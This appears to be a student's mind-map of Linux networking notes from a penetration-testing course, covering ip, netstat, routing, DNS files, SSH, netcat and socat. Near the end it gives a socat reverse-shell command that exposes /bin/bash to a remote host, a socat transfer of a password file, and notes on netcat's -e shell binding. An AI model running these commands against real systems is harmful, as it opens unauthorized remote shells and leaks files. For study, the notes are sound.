Please enable JavaScript.
Coggle requires JavaScript to display documents.
Linux Networking and Services I - Coggle Diagram
Linux Networking and Services I
Essential Network Utilities
ifgonfig
to indentfy the net information
iproute2
used for managing networking
ip addr
show and manage IP addresses
lo
stands for loopback interface — it's a special, virtual network interface used by your system to communicate with itself.
CIDR (Classless Inter-Domain Routing)
is used for IP address allocation and efficient routing on the internet and local networks.
inet
typically refers to IPv4 addressing in Linux configuration files and commands.
NIC
It’s the hardware component that allows a device to connect to a network.
Sticky MAC addressing
locks the first learned MAC address to a switch port to prevent unauthorized devices from connecting.
allow-hotplug
enables a network interface to start automatically when the system detects the hardware.
iface
s the type of connection that will be made. The type of connection can be "static" or "dhcp" (dynamic).
DNS
it translates human-friendly website names (like google.com) into IP addresses (like 142.250.190.14) so computers can find and connect to each other.
Checking Network Activity
netstat -natup
n: Show numerical addresses instead of resolving hostnames.
a: Show all connections (listening and non-listening).
t: Display only TCP connections.
u: Display only UDP connections.
p: Show the process ID (PID) and program name using the connection.
the local adderss of foregin address has no state becase it is UDP
LISTEN Server is waiting for incoming connections (passive open).
SYN_SENT Client sent a connection request, waiting for response.
SYN_RECV Server received SYN and sent back SYN-ACK, waiting for ACK.
ESTABLISHED Connection is open and active.
FIN_WAIT1 Connection is closing, FIN sent, waiting for ACK.
FIN_WAIT2 FIN was acknowledged, waiting for remote to send its own FIN.
CLOSE_WAIT Remote closed the connection, local is waiting to close.
CLOSING Both sides sent FIN, waiting for final ACK.
LAST_ACK Local closed, waiting for final ACK from remote.
TIME_WAIT Finished, waiting to ensure last ACK was received.
CLOSED No connection exists (not shown often in netstat).
arp -en
shows the current IP-to-MAC mappings (ARP cache) in numeric form and is useful for scripting, performance, and clarity.
Routing and Network Troubleshooting
route
displays the current routing table of your system.
the colum of table
Destination The target network or IP address that the packet is trying to reach.
Gateway The next hop (router or device) the packet should go to in order to reach its destination. If the destination is directly reachable, the gateway might be 0.0.0.0 or *.
Genmask The subnet mask associated with the destination. It defines which part of the IP address is the network and which part is the host.
Flags Indicators of how the route behaves.
traceroute
is a command used to trace the path that data packets take from your computer to a destination, showing each hop (router) along the way and how long it takes to reach each one.
IP addresses and Domain Names
/etc/resolv.conf
the key directives
/etc/hosts
have the contents of the hosts file
/etc/nsswitch.conf
configures how the system resolves names for various databases
Remote Connections with Secure Shell
Secure Shell Protocol (SSH)
is a client/server protocol for enabling secure communications between two hosts.
Communication over SSH is encrypted over the network, whereas telnet
SSH works on TCP port 22 by default
sudo systemctl start ssh
sudo systemctl status ssh
ssh
kali@localhost
to test the ssh
/etc/ssh/ssh_config
global SSH client configuration file
/etc/ssh/sshd_config
It controls how other people (or you) can connect to your machine
SSH fingerprint
is a short, unique identifier of a server’s public key.
~/.ssh/known_hosts
It stores fingerprints of the SSH public keys of servers you've connected to.
This file ensures a secure connection to the same server, preventing MITM attacks.
scp
offensive@192.168.55.61
:/home/offensive/.bashrc Copiedbashrc
securely transfers files between hosts over SSH.
sshpass -p 'security' ssh lab
is a command-line tool that allows you to automate SSH login by providing a password non-interactively.
is insecure because it stores passwords in plain text, posing security risks.
Netcat (nc)
client mode to connect to any TCP/UDP port.
nc -nv 192.168.55.61 22
-n
skip DNS name resolution
v
Verbose mode
it will print more information
Netcat (nc) is a versatile networking tool that can read and write data across network connections, used for tasks like port scanning, banner grabbing, and creating network connections.
Listening on a TCP/UDP Port
nc -lvnp 6666
-l
listing
-p
to listing to spceifc port
Transferring Files with Netcat
nc -lvnp 6666 > incoming.txt
redirect any output into a file called incoming.txt:
Remote Administration with Netcat
The -e option in Netcat binds a program (like a shell) to a network port, allowing remote interaction when someone connects. While useful for security testing, it poses significant security risks if misused and is often disabled on modern systems, though it's still supported in Kali Linux for penetration testing.
Remote Administration with Netcat
?
Reverse Shell Scenario
?
Socat
Netcat vs. Socat
nc <remote server's ip address> 80
socat - TCP4:<remote server's ip address>:80
-
STDIO
remote host (allowing our keyboard interaction with the shell)
sudo nc -lvp localhost 443
sudo socat TCP4-LISTEN:443 STDOUT
add both the protocol for the listener (TCP4-LISTEN) and the STDOUT argument, which redirects standard output.
Socat File Transfers
Alice needs to send Bob a file
kali@kali
:~$ sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt
fork for the connection be multiple
C:\Users\offsec> socat TCP4:10.11.0.4:443 file:received_secret_passwords.txt,create
C:\Users\offsec> type received_secret_passwords.txt
"try harder!!!"
Socat Reverse Shells
C:\Users\offsec> socat -d -d TCP4-LISTEN:443 STDOUT
... socat[4388] N listening on AF=2 0.0.0.0:443
kali@kali
:~$ socat TCP4:10.11.0.22:443 EXEC:/bin/bash
Once connected, Bob can enter commands from his socat session, which will execute on Alice's machine.
socat TCP4-LISTEN:4444,reuseaddr,fork -
reuseaddr-is for Allows the port to be reused after the listener